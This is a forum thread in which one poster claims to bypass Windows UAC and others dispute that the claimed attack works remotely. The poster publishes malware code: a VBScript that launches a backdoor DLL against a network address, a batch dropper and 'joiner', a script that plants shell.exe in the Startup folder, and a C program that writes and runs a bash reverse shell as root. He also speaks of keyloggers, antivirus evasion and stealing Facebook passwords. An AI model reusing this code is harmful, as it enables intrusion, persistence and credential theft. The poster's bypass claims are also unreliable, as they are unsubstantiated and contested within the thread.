UAC Mode can be bypassed!

[Nico@FMA]

I make my own exploits and stuff very cool!

Would it be ok to share a minor binary code to shut some people up?

Listen i am not trying to discredit you ok? But what you showed is running your exploit from the inside of the OS.
We all know that this will work for known various reasons.
I told you to do this from the outside and try to penetrate the system, while keeping the scenario in mind that i posted earlier.
Now i ask you how would you do that? Please you want us to learn? Sure then i ask you write a step by step post how you are going to penetrate a system and then use your exploit etc etc etc.

Remember? i did challenge you... so make us learn.

 

[(BlackBox) Hacker]

I'm not uploading the files, but you might like some code?

' Backdoor Shellcode - created by (BlackBox) Hacker
' Written on 09/05/2014
' Compiled with the VbsEdit Program

Dim shell
' // Bypassing UAC using asInvoker!
Set payload = WScript.CreateObject("WScript.Shell")
shell = "cmd /c"
payload.run shell & "C:\Windows\temp\bd.dll 192.168.1.3 1000", 0, True

I have made a more silent way to infect PC through the UAC Mode! First you need a shell.exe the code above shown, then I make a dropper file for it! You will then make a dropper file and add the FUD & EXE Joiner Exploit Batch Script I have made!

:: // FUD & EXE Joiner Exploit Batch Script! - by (BackBox) Grey Hat Hacker
:: Created on 18/02/2014
:: Compiled with "Bat_To_Exe_Converter.exe" Compiler
@echo off
Game.exe
set Sleeping=%1
echo waiting %Sleeping% s
echo WScript.sleep %wait%5000 ' // SLEEP for five seconds zzZ > Sleeping.vbs
Sleeping.vbs
dropper.exe
::
:: Don't forget to add your ISO Image...
::

Now all you need is the Spyware file and the dropper file, note make sure you add all the files to Bat_To_Exe_Converter Software!

Someone else's source code here, but this will not work as good as my exploit, because of the buffer overflow and the built-in Keylogger for example shellcode like this!

payload.run shell & "C:\Windows\temp\bd.dll 192.168.1.3 1000", 0, True

http://www.rohitab.com/discuss/topic/27868-remote-shell/

Code with missing chunks of code!

' Trojan Dropper Shellcode - created by (BlackBox) Hacker
' Written on 17/05/2014
' Compiled with the VbsEdit Program

Dim fso, network, autorun_1, autorun_2
' // Bypassing UAC using asInvoker!
Set fso = CreateObject("Scripting.FileSystemObject")
Set autorun_1 = fso.GetFile("bd.dll")
Set autorun_2 = fso.GetFile("shell.exe")
autorun_1.copy ("C:\Windows\temp\bd.dll")
autorun_2.copy ("C:\Users\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\shell.exe")

This is my Linux version works very well, also bypassed the UAC for the Linux Mint Operating System I have programmed a few Years back now!

/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
* Backdoor.c
* Copyright (C) 2014 (BlackBox) Grey Hat Hacker <ade@PC-U180>
*
* Revers_Shell_Exploit is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* Revers_Shell_Exploit is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program.  If not, see <http://www.gnu.org/licenses/>.
*
*
* Exploit compiled with Anjuta Compiler!!!
*
*/

#include <stdio.h>
int main()
{
FILE *fp;
char* str = "string";
int x = 10;
fp=fopen("/tmp/Update.sh", "w");
if(fp == NULL)
exit(-1);
fprintf(fp, "#!/bin/bash\n");
fprintf(fp, "exec 5<>/dev/tcp/127.0.0.1/1000\n");
fprintf(fp, "cat <&5 | while read line; do $line 2>&5 >&5; done\n");
fclose(fp);
system("gksu -u root /bin/bash /tmp/Update.sh");
system("rm /tmp/Update.sh");
return (0);
}

the malwarehub is your friend ^^

http://malwaretips.com/forums/virus-exchange.104/

 

[illumination]

Would it be ok to share a minor binary code to shut some people up?

I want to see you post, like i said some many comments ago, a video of you testing this on a limited rights account as well as a remote system on your network, or better yet another network, once i have seen these, i will give you an ounce of credit. I truly hope this does not ruffle your peacock feathers, but this arrogance and rudeness have gone just about far enough..

 

[(BlackBox) Hacker]

Most users will use the UAC on Administrator which acts as a limited user already, Unless you disable the UAC Mode, so the new Windows 8 Pro is perfect for the job as well as Windows 7. I have done loads of hacking video's on Youtube before, but I don't do them anymore. I've been banned that many times and stuff on many sites! I can share some cool code that you might like?

I've helped this person bypass Antivirus!



All of my Video's are deleted from my Channel, I only do security on Youtube now sorry!

I want to see you post, like i said some many comments ago, a video of you testing this on a limited rights account as well as a remote system on your network, or better yet another network, once i have seen these, i will give you an ounce of credit. I truly hope this does not ruffle your peacock feathers, but this arrogance and rudeness have gone just about far enough..

 

[Littlebits]

WOW what an expert not, I bet you don't test security much?

Why do I need to run tests that require Admin rights on local systems? it proves nothing at all period.

Any beginner hacker can exploit their own system with Admin rights. Sure I can also write scripts and exploits that will work on local system with Admin rights but what's the point? Nothing will be ran on my local system without my approval which makes these tests obsolete. And like others have already mentioned its not your scripts or hacking skills that works on local systems with Admin rights, it is the users own ignorance that makes them successful.

Enjoy!!

 

[(BlackBox) Hacker]

Well hackers want access over Computers to get Facebook passwords ect. that's the point, If your not interested well this would sound very boring indeed! Is it also very interesting what security stops cyber criminals as such for a home user including UAC recommended by Steve Gibson security researcher? I'm also a Security Researcher as well as Ethical Gray Hat Hacker or Computer Scientist releasing a Firewall Controller!

Why do I need to run tests that require Admin rights on local systems? it proves nothing at all period.

Any beginner hacker can exploit their own system with Admin rights. Sure I can also write scripts and exploits that will work on local system with Admin rights but what's the point? Nothing will be ran on my local system without my approval which makes these tests obsolete. And like others have already mentioned its not your scripts or hacking skills that works on local systems with Admin rights, it is the users own ignorance that makes them successful.

Enjoy!!

I will uninstall Spy Shelter and fix my security flaws when I definitely install Comodo Antivirus and yes I know it's like Spamming, but I use this never the less Windows Firewall Console the newer version! So the verdict on this topic is that Comodo Antivirus and Applocker does very well on Blocking and can be used instead of UAC!

 

[Littlebits]

Well hackers want access over Computers to get Facebook passwords ect. that's the point, If your not interested well this would sound very boring indeed! Is it also very interesting what security stops cyber criminals as such for a home user including UAC recommended by Steve Gibson security researcher? I'm also a Security Researcher as well as Ethical Gray Hat Hacker or Computer Scientist releasing a Firewall Controller!

I already know what security actions stops cyber criminals-
1. The users own actions- when downloading and running files and UAC prompts. (no security products will protect against everything, no need to test them all because at least one product will be failed on each test if not more)
2. Keeping Windows and your software updated to protect against exploits and hacks.
3. Use a router-based hardware firewall.
4. If you are a novice user then use a "Limited User Account" to do your normal activities.
5. Password your Admin Account against unauthorized users and never give out your password.

You have to understand there are two types of security products, the ones that are user-friendly and work well if used with common sense (cautious user actions and safe downloading skills), the other types are made to pass tests are not user-friendly, block many safe processes and still require advanced user actions to be successful.

Enjoy!!

 

[(BlackBox) Hacker]

That's very good that list, but did you know installing Updates can also exploit the Computer? Using .Net Framework 4.0 and Java is very bad!

I already know what security actions stops cyber criminals-
1. The users own actions- when downloading and running files and UAC prompts. (no security products will protect against everything, no need to test them all because at least one product will be failed on each test if not more)
2. Keeping Windows and your software updated to protect against exploits and hacks.
3. Use a router-based hardware firewall.
4. If you are a novice user then use a "Limited User Account" to do your normal activities.
5. Password your Admin Account against unauthorized users and never give out your password.

You have to understand there are two types of security products, the ones that are user-friendly and work well if used with common sense (cautious user actions and safe downloading skills), the other types are made to pass tests are not user-friendly, block many safe processes and still require advanced user actions to be successful.

Enjoy!!

I have changed my mind I'm thinking very geeky now, since I have a 500mb data usage cap per day. I will use Microsoft Security Essentials and Applocker for the Zer0-day threats!

Now to setup Applocker on my PC!

First start the Applocker process!

You can use any Remote Terminal and Execute these commands remotely for Applocker Security without DC's Domain Controllers, just using any small Networks using either Ncat or Telnet maybe your own Computer Backdoor without user authentication. First open a command prompt or Shell and type the following inputs! But anybody with the basic starter Windows version will not get the extra security such as Applocker!

1. Powershell
2. Import-Module Applocker
3. Get-Command *Applocker*
4. Get-AppLockerFileInformation –EventLog –EventType Denied –Statistics
5. Get-AppLockerFileInformation -Path "" | New-AppLockerPolicy -Optimize | Set-AppLockerPolicy -Merge

Make sure you use the merge in the command overwise you will lock yourself out of your own Computer System!

Use the default rules now and add your applications later! This will set policies for your File Signatures your MD5 Hashes! Now this is much better than Comodo less download usage and RAM plus CPU usage as well.

Layer 1 Applocker blocks the executable files
Layer 2 Antivirus detects your Malware for removal
Layer 3 Windows Two Way Firewall - Windows Firewall Console
Layer 4 MAC Spoofing (Optional)
Layer 5 ARP Spoofing (Optional)
Layer 6 Mifi Router - NAT protection
Layer 7 Web Proxy (Optional)
Layer 8 VPN Servers (Optional)

Testing the fun stuff check this out!

Well hard drive access is blocked ect.

And this was the UAC Spyware or exploit!

 

[Nico@FMA]

@(BlackBox) Hacker

I want to see you post, like i said some many comments ago, a video of you testing this on a limited rights account as well as a remote system on your network, or better yet another network, once i have seen these, i will give you an ounce of credit. I truly hope this does not ruffle your peacock feathers, but this arrogance and rudeness have gone just about far enough..

Why do I need to run tests that require Admin rights on local systems? it proves nothing at all period.

Any beginner hacker can exploit their own system with Admin rights. Sure I can also write scripts and exploits that will work on local system with Admin rights but what's the point? Nothing will be ran on my local system without my approval which makes these tests obsolete. And like others have already mentioned its not your scripts or hacking skills that works on local systems with Admin rights, it is the users own ignorance that makes them successful.

Enjoy!!

Did you pay any attention to what Littlebits and Illumination said? Or to what i asked some posts back?
You can hack your local system all you want and yes its working DUHHH.
Now try to do that on a remote system....remember the scenario i posted you? It will not work.
What does it take to make you understand? a sledge hammer? <facepalm>
All these screenshots and bla bla posts mean nothing.

SO LET ME CHALLENGE YOU AGAIN: SHOW US A VIDEO WHERE YOU PENETRATE A REMOTE SYSTEM USING THE SCENARIO I MENTIONED EARLIER.

Till that moment please stop posting nonsense as everyone here knows you are WRONG.

@ Admin or moderator: Please confirm what i just said.

 

[(BlackBox) Hacker]

Using the Applocker with Powershell commands!

Did you read what I said on one of my posts? That I don't upload hacking video on Youtube anymore, plus the videos you want to see have been deleted from my channel sorry, I would have to setup two Computers with VNC to capture the UAC being bypassed as well! And I only have a Netbook I'm using and a Virtual PC which is called "LAB" that too is also my Netbook as well.

@(BlackBox) Hacker

Did you pay any attention to what Littlebits and Illumination said? Or to what i asked some posts back?
You can hack your local system all you want and yes its working DUHHH.
Now try to do that on a remote system....remember the scenario i posted you? It will not work.
What does it take to make you understand? a sledge hammer? <facepalm>
All these screenshots and bla bla posts mean nothing.

SO LET ME CHALLENGE YOU AGAIN: SHOW US A VIDEO WHERE YOU PENETRATE A REMOTE SYSTEM USING THE SCENARIO I MENTIONED EARLIER.

Till that moment please stop posting nonsense as everyone here knows you are WRONG.

@ Admin or moderator: Please confirm what i just said.

 

[Nico@FMA]

Did you read what I said on one of my posts? That I don't upload hacking video on Youtube anymore, plus the videos you want to see have been deleted from my channel sorry, I would have to setup two Computers with VNC to capture the UAC being bypassed as well! And I only have a Netbook I'm using and a Virtual PC which is called "LAB" that too is also my Netbook as well.

Pfff no comment the challenge stands as it is.

 

[Koroke San]

@n.nvt said that he wants a video proof, didn't mentioned that u need to upload it in yt only. u can upload it in other sites like
TinyPic

 

[(BlackBox) Hacker]

The way my LAB is setup I can't capture the UAC Screen! I'm trying to find Software to make the Video or any Registry Hacks, the only way I could think of is by using VNC!

http://www.ntwind.com/tutorials/taking-screenshots-of-uac-prompts-with-winsnap.html

@n.nvt said that he wants a video proof, didn't mentioned that u need to upload it in yt only. u can upload it in other sites like
TinyPic

 

[(BlackBox) Hacker]

Well this works very nice, the video is coming very soon!

 

[Koroke San]

K good luck mate, waiting for ur interesting video

 

[(BlackBox) Hacker]

Bypassing UAC Video!



This video don't show my old exploit not just the code execution, but the newer exploit as a Trojan dropper file infecting the Computer and then code execution of Spyware through the UAC Mode. Also one of my downloaded executable files just bypassed it as well, the file was a unsigned application. Now every time your PC restarts the connection is made and keylogger is running!

Dropped files:
C:\Windows\temp\bd.dll
C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shell.exe

Created files:
C:\Windows\temp\porn.jpg

I really like making my own exploits, but if you find it very hard to use? You can also use Metasploits as well in the same way!

Downloads here!
https://www.trustedsec.com/downloads/tools-download/

Links:
http://www.phillips321.co.uk/2013/10/22/one-line-python-meterpreter-reverse-shell/

Baisc Users stuff!
http://www.fastandeasyhacking.com/




Thank you for your Post, I'll hope you like the Video!

K good luck mate, waiting for ur interesting video

 

[Littlebits]

Bypassing UAC Video!



This video don't show my old exploit not just the code execution, but the newer exploit as a Trojan dropper file infecting the Computer and then code execution of Spyware through the UAC Mode. Also one of my downloaded executable files just bypassed it as well, the file was a unsigned application. Now every time your PC restarts the connection is made and keylogger is running!

Dropped files:
C:\Windows\temp\bd.dll
C:\Users\Adrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shell.exe

Created files:
C:\Windows\temp\porn.jpg

I really like making my own exploits, but if you find it very hard use Metasploits? You can also use that as well in the same way!

Thank you for your Post, I'll hope you like the Video!

Still not what we were expecting, this is just a hack ran on local admin account, try the same on limited user account or remote system.

There are tons of videos that shows hacking tools used to exploit the system but they never work unless the user running on admin account manually downloads them and manually runs them.

Thanks.

 

[Nico@FMA]

Well this works very nice, the video is coming very soon!

View attachment 11559

So you are finally going to make a video where you penetrate a REMOTE windows OS that:
1: Is totally updated and configured.
2: DEP is on.
3: UAC is on.
4: Internet Security Software + firewall enabled.
5: Third party software updated.
6: Is connected trough a network with Hardware based firewall?
7: And you are using STRICTLY your exploit and nothing else to penetrate the system.
7: And most importantly has NOT been changed to allow your programs to work?

If any of these conditions fail this would mean your video is worthless.
Again i respect your knowledge when it comes to exploits, some of the things you said are valid and spot on, and i will be the first to admit that UAC can be bypassed both internal and external, however to achieve this MANY things have happened before this would be possible in the first place.
The point i am trying to make is simple: A standard windows using the config i have mentioned will not allow your exploit to change the UAC without: Warning, Logging or even blocking it. (This includes internet security and all other standard protection)
Obviously ANY PC can be infected if the user is click happy but if the user is paying attention to his PC then your exploit will fail (And no i am not talking about governmental exploits and other highlevel crap)
And this is the point me and many others where trying to make.
Yesterday you did dodge most of the questions and made silly comments about all kinds of stuff, lets forget that and just go from here.
Get me the video and i will be impressed and you made your point (and i will stand correct if so) But if not then obviously you own us a BIG sorry, as we tried to explain you this.

How does that sound?
Cheeers

@Littlebits
Totally correct m8.

 

[(BlackBox) Hacker]

I'm not the only one who has to prove stuff? This sounds like a load of rubbish! You make a video bypassing the UAC now if you can? And it must be your own client you can't use Metasploits see how you like it?

Still not what we were expecting, this is just a hack ran on local admin account, try the same on limited user account or remote system.

There are tons of videos that shows hacking tools used to exploit the system but they never work unless the user running on admin account manually downloads them and manually runs them.

Thanks.

So you are finally going to make a video where you penetrate a REMOTE windows OS that:
1: Is totally updated and configured.
2: DEP is on.
3: UAC is on.
4: Internet Security Software + firewall enabled.
5: Third party software updated.
6: Is connected trough a network with Hardware based firewall?
7: And you are using STRICTLY your exploit and nothing else to penetrate the system.
7: And most importantly has NOT been changed to allow your programs to work?

If any of these conditions fail this would mean your video is worthless.
Again i respect your knowledge when it comes to exploits, some of the things you said are valid and spot on, and i will be the first to admit that UAC can be bypassed both internal and external, however to achieve this MANY things have happened before this would be possible in the first place.
The point i am trying to make is simple: A standard windows using the config i have mentioned will not allow your exploit to change the UAC without: Warning, Logging or even blocking it. (This includes internet security and all other standard protection)
Obviously ANY PC can be infected if the user is click happy but if the user is paying attention to his PC then your exploit will fail (And no i am not talking about governmental exploits and other highlevel crap)
And this is the point me and many others where trying to make.
Yesterday you did dodge most of the questions and made silly comments about all kinds of stuff, lets forget that and just go from here.
Get me the video and i will be impressed and you made your point (and i will stand correct if so) But if not then obviously you own us a BIG sorry, as we tried to explain you this.

How does that sound?
Cheeers

@Littlebits
Totally correct m8.

Yep this requires no response!!!

Still not what we were expecting, this is just a hack ran on local admin account, try the same on limited user account or remote system.

There are tons of videos that shows hacking tools used to exploit the system but they never work unless the user running on admin account manually downloads them and manually runs them.

Thanks.

 

[illumination]

I'm not the only one who has to prove stuff? This sounds like a load of rubbish! You make a video bypassing the UAC now if you can? And it must be your own client you can't use Metasploits see how you like it?

You are the one claiming the UAC and default security on a system can not protect users, but so far all you have shown us is the ability to infect and penetrate your own system with Admin rights. Show us that a normal system can be attacked with this method by remoting one in a video. Do not forget to use tools like Fiddler Web Debugger, or Wireshark, so we can view the connections being made from the targeted system to yours.